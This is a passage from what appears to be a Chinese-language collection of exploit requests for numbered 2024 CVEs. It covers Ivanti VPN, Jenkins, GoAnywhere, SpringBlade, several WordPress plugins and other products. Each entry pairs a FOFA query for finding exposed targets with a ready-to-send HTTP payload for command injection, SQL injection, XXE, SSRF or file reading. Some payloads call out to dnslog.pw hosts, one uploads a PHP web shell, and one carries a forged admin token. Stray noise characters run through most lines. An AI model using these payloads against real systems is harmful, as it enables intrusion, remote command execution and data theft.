/ {) G* q$ d5 h5 g* kX-Requested-With: XMLHttpRequest
; g$ T3 ^/ h+ I3 j+ u
+ ~2 }9 B) l5 S/ t% did=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B5 X* f# L$ A: V
5 @7 b% a0 {# q' m6 ?0 O* b
# |4 }0 T6 ^. p2 {& V+ Q7 O8 X99. Ncast盈可视高清智能录播系统busiFacade RCE
4 i9 Z4 |* o5 x( }. xCVE-2024-0305
( E+ T7 H0 S$ dFOFA:app="Ncast-产品" && title=="高清智能录播系统"
. c, N. t, d! I, kPOST /classes/common/busiFacade.php HTTP/1.1
3 _( Q& `/ m9 O3 SHost: 192.168.40.130:8080# {2 X# i% \( x9 O7 A4 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( J: Y/ T/ p' g0 b7 `
Connection: close' }+ B, G, ]% n' z. y4 A7 m' _ T& @
Content-Length: 1548 S; T0 _% m5 _! Q$ \
Accept: */*
5 ~3 O. i8 @5 v& _- o1 VAccept-Encoding: gzip, deflate
# T' E4 D# v$ t9 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ L4 i; Q# Q* Q+ f l# t0 Y
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 A' V3 }5 y! r3 n: v: w4 G4 YX-Requested-With: XMLHttpRequest, A" Z- Y0 p: N
3 p* i( f u; ~
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D0 h9 `4 _1 D" f Z8 }
$ D- B9 @( i! ]3 h' v5 G
6 x# e0 [' U7 C6 r100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& b/ o5 m, B8 b
CVE-2024-0352" z9 N" M! e* U0 b3 X
FOFA:icon_hash="874152924"7 o: m( j" i1 r. H4 t- O/ z
POST /api/file/formimage HTTP/1.1
5 F% A( e& U9 q. y3 _+ EHost: 192.168.40.1307 \6 e% H- i: M1 Z' H/ s& ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
& t- ?( _) [2 t0 x! FConnection: close0 @8 p' Q/ w3 U" u: n
Content-Length: 201
# t7 L$ I' q' V0 B9 M& a5 `8 ]) wContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
. a$ D$ z* t9 e' Z1 t4 jAccept-Encoding: gzip
: ~) P& V& ^8 p L: {
0 j7 {* a% j& ]: H/ J$ B: Q4 h% F------WebKitFormBoundarygcflwtei
0 s/ Z$ c7 h5 f2 r( zContent-Disposition: form-data; name="file";filename="IE4MGP.php"8 s* f, Z6 b, p+ W8 K
Content-Type: application/x-php
7 O; I/ Z" I- w. e* P; c3 ?7 ?" M6 D& ?. ]: q/ Z: t5 f3 b2 a
2ayyhRXiAsKXL8olvF5s4qqyI2O
( |9 V5 Y# e. @2 L; H- s3 U------WebKitFormBoundarygcflwtei--; L: l }" U5 Q/ K# ]1 \+ q+ J
; P$ [: I; r: Y" P( R3 m" z3 X9 A
3 @0 r. n. Q; H101. ivanti policy secure-22.6命令注入+ L, R" I# G$ c( U: k. W' [& [
CVE-2024-21887# c% u! N9 W' r3 Y- p& [2 O
FOFA:body="welcome.cgi?p=logo"; S2 k z- j( e8 L
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
8 d2 @1 r; ~9 h( A( ~Host: x.x.x.xx.x.x.x
8 @" c6 ]* }, g( }7 |! `& sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' _0 s( h; M! n' G6 x! i, h7 r9 LConnection: close
2 O, g# @3 H6 `4 ^Accept-Encoding: gzip) p% z; | K" R% B( P: I' B" {. c
) y7 z# } v, J2 t6 i0 K5 ]
! q+ O* {1 z6 l102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
i9 w# q* W) T' XCVE-2024-21893
, w) A6 u$ ~/ R. `, G& zFOFA:body="welcome.cgi?p=logo"
% C# m# F/ z/ U% X ZPOST /dana-ws/saml20.ws HTTP/1.1
4 Z$ L) w7 Y- b+ n* O$ Z j; W' l+ RHost: x.x.x.x- K: N# ?3 E c# D7 r& p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 C4 }7 X* T: Z E, LConnection: close
" s$ ~, Y( H1 F6 } C0 }Content-Length: 792+ t) f3 c, v& @% O) b' |
Accept-Encoding: gzip
/ w0 f% N0 ~' `! w) {; g0 ^. k5 i8 l |
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
& C6 S+ ]8 q# _# \0 W( U& G) ]5 I$ i8 q9 ^8 t
103. Ivanti Pulse Connect Secure VPN XXE
p! P1 b& C6 [! u, nCVE-2024-22024
8 b i1 y$ @" S* P! q" uFOFA:body="welcome.cgi?p=logo"8 u2 [0 G6 i0 a2 U0 S
POST /dana-na/auth/saml-sso.cgi HTTP/1.1! F/ m- o* l/ B, Z: R
Host: 192.168.40.130:111
( [1 j. b$ |) G! u1 G) OUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
% D& X9 b8 W3 {3 CConnection: close+ T6 ~4 \) N* J# _
Content-Length: 204$ R/ A" D! q8 n& ?+ Z+ p2 \
Content-Type: application/x-www-form-urlencoded6 r0 s7 f, k- |$ F' e1 j9 ?
Accept-Encoding: gzip6 Q. g. D& r1 F
. y$ r8 `2 `- ~, n4 `: x8 o; uSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==# ^- k3 Z( L& U& a4 J0 \$ p# k4 ~
0 s" t8 m: X) ^9 [. D4 b3 O
4 V$ ^; y; j$ w( p
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下/ i! f* n/ N. Z9 E: g/ R7 F9 U' z$ H: n
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
0 k# ]4 ^' T7 S
R2 w7 a4 B# L* Y9 Q* p5 l
7 S' h& I% U% n/ Z1 d) k, g3 v! `, j104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* g Z2 X8 c Z5 i6 T6 ^9 ]CVE-2024-05697 ^. d' P- \$ t2 a+ S
FOFA:title="TOTOLINK"
, V( j4 E, I8 V$ V2 {& yPOST /cgi-bin/cstecgi.cgi HTTP/1.1: c% r5 q$ U: w) S) G; S: ~ P
Host:192.168.0.1
4 q* f& S0 l8 l' V6 @Content-Length:41
o6 Q0 Z2 _0 G" `, _4 OAccept:application/json,text/javascript,*/*;q=0.01. D( p) @( o: a
X-Requested-with: XMLHttpRequest4 ]! z/ V% n; f
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.367 k, o/ d o$ ]' X+ R3 |
Content-Type: application/x-www-form-urlencoded:charset=UTF-8. h1 ?9 K; K* @+ s/ C4 c
Origin: http://192.168.0.1
' f0 y) \; D) m" N/ i3 }8 e3 K2 D0 ]Referer: http://192.168.0.1/advance/index.html?time=1671152380564
], }" U, w7 ^: G: N+ w; ^1 j+ W; lAccept-Encoding:gzip,deflate- S4 {' @; v2 S" q
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.72 C6 b4 X8 ^, W- O( A8 x& W
Connection:close3 u% ~' ]- W. N" E
( G8 u$ \- K, @4 Y* t7 k{
: L7 F$ W8 I" l, b"topicurl":"getSysStatusCfg",! f; @3 a- T9 h
"token":""' Q* E0 I: a. e
}
* R# }2 p1 }& Y: _9 h9 [3 p9 a8 M% j4 v, i, Z/ w
105. SpringBlade v3.2.0 export-user SQL 注入
6 R: H, g! f6 l4 }. IFOFA:body="https://bladex.vip"
1 D' x2 @/ u# J, r' Zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
7 x) _+ e3 `8 z8 n$ ~8 ~
2 a ]& x# R! y. O- ~& J106. SpringBlade dict-biz/list SQL 注入8 r% R3 {/ E9 b
FOFA:body="Saber 将不能正常工作"
, @4 K* H' s2 t) [8 O2 q: KGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 U0 i, L, T6 E; B; }& MHost: your-ip
7 [& @; E/ W5 h) M! \: E2 [2 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ ]7 C" G8 j. p1 T; e3 a- Z6 eBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
* ^7 V: t# _2 cAccept-Encoding: gzip, deflate2 [8 w/ M, `3 F" [. S, Z+ z) ^
Accept-Language: zh-CN,zh;q=0.9
/ X$ h( l- u( k; ~/ M8 jConnection: close' a9 v9 f8 t% _" ?$ O' X2 |
" z$ _) a$ |6 x$ d4 {% G6 F# A
2 T3 {8 |- Z1 C! j' l N5 a# Z
107. SpringBlade tenant/list SQL 注入+ C0 {4 {& T/ b( e- C- a* B
FOFA:body="https://bladex.vip"' j W( w' w8 ^0 Q) y/ t
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" b( A0 ~8 R8 b& `Host: your-ip
9 f3 {9 ^( ^) u& u" tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 W5 n- y1 ^' h) S7 \* L$ JBlade-Auth:替换为自己的6 Y0 m) D: O) P" A8 ]* p
Connection: close
& ~0 V+ w, n; Y3 j* c- ?$ a4 i* F( r; q% X1 X, h
" F6 {+ @+ u4 |% g9 A8 @" z108. D-Tale 3.9.0 SSRF
9 L- g. O8 m; NCVE-2024-21642
7 @) y$ y' q- nFOFA:"dtale/static/images/favicon.png": R/ `, s5 r" z0 r2 f
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
- D. x, ?) K" D7 }3 nHost: your-ip- h" w1 D$ t, T: ^& Y0 i2 p7 ^% X
Accept: application/json, text/plain, */*( e0 A5 q2 y- H) J( a* ?9 A. H; o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 i4 J! g: m# m5 m+ r' F
Accept-Encoding: gzip, deflate
8 S$ c0 U; H: @3 ^: ZAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' e1 \' _& y2 q$ O) }* Y9 r) ^Connection: close9 W7 O( R2 O* g) B
; m+ O W" J1 Z! S( p
" V. G9 _9 I" s6 C# j& F" x
109. Jenkins CLI 任意文件读取
! R1 v. `; c4 I( B; ]! m0 y% aCVE-2024-238971 }+ V- C7 [# l% Z/ S |7 t3 j
FOFA:header="X-Jenkins"
/ B S! e+ e$ J5 @1 e; Q) R# aPOST /cli?remoting=false HTTP/1.1
6 K9 F5 e5 R" d. R2 Q5 t# L: JHost:8 k4 s+ J: Y2 @& Q6 ^- z
Content-type: application/octet-stream
5 b+ P/ Q# o9 w, YSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
1 y0 c& a' D& ]+ l- QSide: upload
+ j6 P2 h3 P7 u: g, sConnection: keep-alive
; l* y" @* B* ^0 [ mContent-Length: 163
) X( a" R m9 t2 K- i; u3 ~0 f# ^* b, i9 m1 j
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'% J% b; M! @+ ?1 ~+ _' d0 j6 \, U
8 ?: ], S( d7 F% n7 }
/ }. U4 \- b) ]/ p; t- _. ~* KPOST /cli?remoting=false HTTP/1.1
, t5 d3 X. r, dHost:, u# W) v. K7 }
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92" g5 u. }, z1 \7 C8 H8 D
download" P- u; b' v" C4 x& M6 N4 ?
Content-Type: application/x-www-form-urlencoded# [. \5 `8 W5 ?* C
Content-Length: 0
' e- z% N0 \4 ?5 P" t) C
' |* _7 r: B! ?4 i* z
6 U9 }/ D, z: B0 s! v& uERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ \' k6 Q7 j+ \5 _java -jar jenkins-cli.jar help. ^& v o, P* G0 s4 |* z
[COMMAND]
# `8 q w$ y$ f% w/ pLists all the available commands or a detailed description of single command.
0 u P3 P- F5 C. H. P* Y! y" Y- r COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* S0 W" O% N0 U) [: s4 O1 z( p- ~
2 k$ [2 u) {9 _7 Q" B& j x1 t, A( k& k$ K4 }- }, z
110. Goanywhere MFT 未授权创建管理员5 Z I3 N9 h1 V6 U3 X
CVE-2024-0204
$ [0 \: Z' L$ K0 _. \- YFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"$ {, t* z+ t! o5 O& B/ T- W( j
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.18 B* K. v% C6 z, o' h: W
Host: 192.168.40.130:8000
) v* e% \8 g. A+ lUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36% [4 B; g) K) X* ~# V; c
Connection: close
# x5 E2 L0 X5 c( hAccept: */*% }4 B1 ]- j8 l9 S+ d5 [ `7 \
Accept-Language: en& U7 ^4 }$ p7 u& ], I3 Q
Accept-Encoding: gzip
7 x) y1 h3 ^( A! q e" O. j8 Q, k) f" ~6 k c
4 h |9 V1 M+ ? m( ~3 v111. WordPress Plugin HTML5 Video Player SQL注入$ J" w' y3 t" A7 ~. K/ v) E
CVE-2024-1061- A" g5 d6 ] \' k
FOFA:"wordpress" && body="html5-video-player"
9 M+ z' F; K2 m5 z" s: j* _GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
: k# W. |/ Y5 KHost: 192.168.40.130:112
3 P+ a* ~! C& j5 l. ~4 Y* q2 \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( M% i6 c- q3 t! aConnection: close
9 E/ b# d% y1 _4 f0 J: J; NAccept: */*7 C( T k/ y* m
Accept-Language: en
, Y$ Z% _% {" f2 z7 aAccept-Encoding: gzip' G: }9 T8 \6 s H! R: n0 U: P
* I% f$ D5 V! {2 e; [: p
: Q* j3 w+ F N# e0 S7 u; Z
112. WordPress Plugin NotificationX SQL 注入' [( ^5 \! D) m& K1 p* W
CVE-2024-1698
; f4 T, i8 r: R- d" g6 V$ e2 gFOFA:body="/wp-content/plugins/notificationx"
+ s- ]4 }3 n; @9 |$ V# Y O5 ^POST /wp-json/notificationx/v1/analytics HTTP/1.1+ }$ Q) G- O4 q6 H6 I1 y
Host: {{Hostname}}0 r* e8 [& D2 X% X/ _" T
Content-Type: application/json" M+ f$ j( N- j5 d! ` }; X4 }
9 G' A6 r$ a9 @4 _: I3 a
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
2 l$ k `7 G3 n; _+ G
5 C C/ D5 N/ e3 q" L$ S: z# \6 v' K2 F
113. WordPress Automatic 插件任意文件下载和SSRF
) [* ?2 ^5 t) n3 m; gCVE-2024-279544 Y# ]: i* D- l6 B' Q
FOFA:"/wp-content/plugins/wp-automatic"3 G* t: ^: J* C* g
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.16 t. Q+ M: c, G) w5 }* x
Host: x.x.x.x3 S* [* Y0 b" P1 @/ d) S8 l
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
5 z5 {% C- E! `+ \4 z9 \7 @Connection: close. |6 m) W' g/ P7 {$ K
Accept: */*
# T( R2 C" T) jAccept-Language: en
. i' R1 ^$ X6 vAccept-Encoding: gzip$ @# ]3 I. n4 c1 V6 a; m! Q
1 o; u; A7 H3 t- y# t
+ Y+ z- E% P. T5 o! A: H" h; c
114. WordPress MasterStudy LMS插件 SQL注入$ J, }$ o* s: }
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
1 L3 L8 g* R) A5 i/ ^$ j7 V" MGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
+ K) U! c F# @& D- m3 zHost: your-ip" V+ p0 V- G7 P# K+ r8 j1 i5 I
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 _% K. C. O" v4 L3 W- j/ V
Accept-Charset: utf-8
& M7 h w" _7 X4 uAccept-Encoding: gzip, deflate
0 a# |' r8 W. G' z l8 ]Connection: close7 X+ C1 H. n7 I$ W
8 m$ O: k& \& l* b0 O
' W. I1 Q% Y5 e) y1 p6 F3 N
115. WordPress Bricks Builder <= 1.9.6 RCE
& E1 C( Z: ]* o' C4 pCVE-2024-25600: z; S, E+ v3 F) G* }7 ?4 E4 O. ?5 b
FOFA: body="/wp-content/themes/bricks/"- t7 F! x4 l" {% n" n; S
第一步,获取网站的nonce值6 m% z$ t# ?" x# e
GET / HTTP/1.1
1 H$ f# f1 W1 W; D0 U1 uHost: x.x.x.x
3 }- O0 \3 o3 P- s h. NUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
* |1 {7 V) }) B. y* `% u( `6 AConnection: close& l) F f3 w9 g
Accept-Encoding: gzip3 |7 l/ d: h6 g6 c9 q, g
) x- x8 A! Q9 s0 R
u! ?, C/ F# Z- L8 l# ~! u第二步替换nonce值,执行命令
& k* T4 S/ K& E' I% d0 TPOST /wp-json/bricks/v1/render_element HTTP/1.12 S8 v9 i7 c% h
Host: x.x.x.x2 T# N; o' z1 j9 k, l- t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% X+ D) b* q& y
Connection: close
) O4 o; O! Q2 N3 G2 n& JContent-Length: 356; q6 A# }" l# v* P% u2 r
Content-Type: application/json
6 C+ R7 N( g k: H' lAccept-Encoding: gzip
" B& I6 M6 k) a* S% c/ ^6 w* {! _( }6 c1 n
{# S4 A) }# b- ?) A8 c% g
"postId": "1",- F$ z1 q* h$ d2 w: Q, v6 P
"nonce": "第一步获得的值",
' _' B; d& ^( o5 M. m1 Q$ V. e "element": {
4 O; ]( N! @8 q. E "name": "container",; [2 B9 S w9 k5 x, r% p4 G3 ~
"settings": {# p2 B0 `/ q. N2 F1 L
"hasLoop": "true",3 _8 T8 u+ ?3 ]3 t7 G
"query": {+ n: |* b1 L6 U0 |7 c# l) _
"useQueryEditor": true,) u* t0 j4 b8 P' Y+ X% @4 T" |
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 @6 a0 w2 l6 @0 A! J1 f" \ "objectType": "post"
0 ~8 P4 v4 S- C4 L2 U4 ?$ _0 g }3 ~; } h. J5 S! i# h
}. V5 d7 U! l7 g: ^
}9 n4 ~6 l' S& g: y- ]; Z
}9 c6 I) H/ [. l. s% w$ A" L
1 x, D$ A6 a* d" Y6 }
; g/ b/ V$ ]6 r$ @7 U* v5 h116. wordpress js-support-ticket文件上传
1 K' m' o6 \9 [. mFOFA:body="wp-content/plugins/js-support-ticket"' _; T3 f' \# x, L6 s8 O* f
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
7 O" g+ H" f' F3 u% w- l+ }Host:* E) o8 v8 I0 ]
Content-Type: multipart/form-data; boundary=--------767099171
( ~% o Q9 S8 g# w1 ?2 |; J2 ZUser-Agent: Mozilla/5.0
8 R+ ?2 S4 d; O- T
' P% O' ~ ?/ s2 u0 l: Z6 u! n----------767099171- ]6 r5 ~+ H/ C# t. \6 g# a3 z
Content-Disposition: form-data; name="action", ?8 ]( W& c' s# B k1 M a, I
configuration_saveconfiguration) J. W# {8 \2 E9 |
----------767099171- J4 H! c) j7 R# K% @0 Q* I. M# |0 c
Content-Disposition: form-data; name="form_request"+ L0 }# Z4 I$ N8 E P% J
jssupportticket
6 _, b3 w# r& E% w3 Q----------7670991719 o/ w) K- L3 U3 W4 c
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"+ u% r1 G8 w( `* }
Content-Type: image/png8 v. y" b0 Z0 t$ O
----------767099171--
9 C1 U" N7 i! X: y
6 m4 p; P& O- s- d) D' N U% g
) t; B+ F8 w# ]4 v+ }117. WordPress LayerSlider插件SQL注入6 {' W: ^% G2 C8 v8 g
version:7.9.11 – 7.10.0; R* S) s, b0 ?1 ?: x+ ~# Y
FOFA:body="/wp-content/plugins/LayerSlider/"3 X) h" F* Q* k- m% T. y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.19 d$ H7 b( D7 ]4 e; I& N) _
Host: your-ip
) j% D& i2 b/ |2 b9 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 P2 O6 R E- u/ E1 M5 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ~3 s& z1 q7 u* j4 q4 ]0 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 F5 e5 F/ v1 `6 R
Accept-Encoding: gzip, deflate, br
' i; @8 _9 t$ H) S3 F% @' }2 T; WConnection: close2 P' @8 }, Z$ F7 E6 ~
Upgrade-Insecure-Requests: 1
/ Z* b+ ?5 i9 P t) q. K8 I- p) j
0 S9 ?* `: H9 C- F9 Y) F$ K) S
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传: m) h- V& W7 i+ [6 O& g0 x
CVE-2024-09398 p3 U) l" J8 K
FOFA:title="Smart管理平台"- ^! Q0 K* ^. ~& E% O3 b
POST /Tool/uploadfile.php? HTTP/1.1
- q% ^8 f: R* n( j9 UHost: 192.168.40.130:8443
! C/ O7 ], d! K* S5 k; E0 F+ rCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
z, K5 o2 W7 U0 ]& G5 l( I& j( wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
0 Q2 b2 D( o8 s% k: |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 t# m$ u+ ?9 {! S7 p5 n5 b$ |! l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, o' x* S. _) W# r0 J+ S& K
Accept-Encoding: gzip, deflate
( g( z- B' G; ^! U% HContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887; `( Z# D h7 {( Y9 { k, i
Content-Length: 405
; s2 z" Y3 M7 rOrigin: https://192.168.40.130:8443+ u# c8 I% P L; ^1 o* a
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
" m7 k/ S8 j" x, h) r2 V9 h' WUpgrade-Insecure-Requests: 1
$ m6 M! F- q& ?/ p0 A1 p# F2 f( eSec-Fetch-Dest: document
+ g1 V/ v! s4 V7 v% K) O' ^Sec-Fetch-Mode: navigate E- q$ X- C+ }) _* D
Sec-Fetch-Site: same-origin+ u9 @$ i# m% J7 u9 n, Q, B
Sec-Fetch-User: ?1& @1 I- ~/ R) P6 D3 _
Te: trailers8 n4 D7 ?9 ?5 C
Connection: close
7 d* M( J# k3 p* H: C. i6 k6 S
( h3 p9 b$ u0 q, [: p; X-----------------------------13979701222747646634037182887* e4 ^" k* \! \7 D/ k" E
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
% |$ A% t: M* [0 z0 CContent-Type: application/octet-stream3 M, N) M. l8 p1 B2 }4 G
9 W% R4 f" a( k" |! E: c
<?php
6 ~2 K' R* C, ], B& \4 v1 bsystem($_POST["passwd"]);9 R* O: {/ {* l( F
?>* U2 ^- o4 e! x* }) W* t
-----------------------------139797012227476466340371828871 L) I+ _$ s# s9 |: w
Content-Disposition: form-data; name="txt_path"
( V1 l% S8 i1 U5 {# U H
" k4 X6 R4 N' g( X5 W/home/src.php7 h. G9 o6 G; R6 u* p3 {. T% U
-----------------------------13979701222747646634037182887--) x3 T$ k8 P; U. L, `' E! k
9 E+ H% n! \+ i7 @. `
" v4 S; _' K: b
访问/home/src.php
3 x6 e! \6 y& e8 J( Y
. b) h3 S# A' s2 ^6 C5 f# w$ q119. 北京百绰智能S20后台sysmanageajax.php sql注入
. ~% r! Q. c1 s; RCVE-2024-1254
. b6 z) S" F4 H9 nFOFA:title="Smart管理平台"
: G" ^7 l: ~, k+ p: T先登录进入系统,默认账号密码为admin/admin( G; E6 ~, X7 l
POST /sysmanage/sysmanageajax.php HTTP/1.11
, X( P0 ^% L' e( h& e- w/ Z. rHost: x.x.x.x/ e% N# R; |! O# |) r# n
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee" | Q5 q9 O2 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0: T x8 d) f8 ~6 i
Accept: */*% W% Z+ c" p. }4 ~9 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 e2 I1 l0 v+ Q' }3 r5 S$ V" ~Accept-Encoding: gzip, deflate& p, b. y0 C$ ]; V
Content-Type: application/x-www-form-urlencoded;. L: F) P% x8 ?( n% K0 K
Content-Length: 1095 u8 {0 K8 i8 K' v- b- d! g
Origin: https://58.18.133.60:8443
+ q/ Q! C- T& G9 T' y2 L- y2 F: ~+ YReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php( I) R [ e1 u
Sec-Fetch-Dest: empty
. Y! N7 o/ \! Y p# Q" O2 y- _Sec-Fetch-Mode: cors0 }6 f1 g# U. e+ G7 n/ Z
Sec-Fetch-Site: same-origin
- N: r7 K" ^* R& iX-Forwarded-For: 1.1.1.1
9 S8 f& D4 u, W- w: G. KX-Originating-Ip: 1.1.1.1
_. y$ b! H: o, fX-Remote-Ip: 1.1.1.1
& _9 r A( u+ U" U+ J5 s7 i$ q' e% lX-Remote-Addr: 1.1.1.1
. h5 p# c, ~4 B. R, wTe: trailers
